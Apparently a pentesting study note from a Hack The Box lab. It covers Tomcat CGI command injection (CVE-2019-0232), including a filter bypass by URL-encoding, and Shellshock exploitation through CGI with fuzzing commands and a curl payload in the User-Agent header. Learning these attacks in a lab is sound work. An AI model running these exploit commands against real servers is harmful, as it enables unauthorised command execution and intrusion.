Tomcat CGI

CVE-2019-0232

Tomcat CGI vulnerable versions to Remote Command execution

• 9.0.0.M1

• 9.0.17

• 8.5.0

• 8.5.39

• 7.0.0

• 7.0.9

Steps to reproduce

1. Use nmap to enumerate specific versions are running on the server

2. Find the CGI-Script:

   1. http://10.129.204.227:8080/cgi/FUZZ.cmd

   2. http://10.129.204.227:8080/cgi/FUZZ.bat

3. Execute the command: http://10.129.204.227:8080/cgi/welcome.bat?&<command>

💡

Apache Tomcat introduced a patch that utilises a regular expression to prevent the use of special characters. However, the filter can be bypassed by URL-encoding the payload.

Shellshock via CGI

• It is a security flaw in the Bash shell (GNU Bash up until version 4.3)

Check if is vulnerable

$ env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"

#Find the file
Intrusionz3r0@htb[/htb]$ ffuf -c -t 400 -w /usr/share/dirb/wordlists/common.txt  -u http://10.129.205.27/cgi-bin/FUZZ.cgi
#Exploit vulnerability
Intrusionz3r0@htb[/htb]$ curl -H 'User-Agent: () { :; }; echo; COMMAND-HERE' bash -s :'' http://10.129.205.27/cgi-bin/access.cgi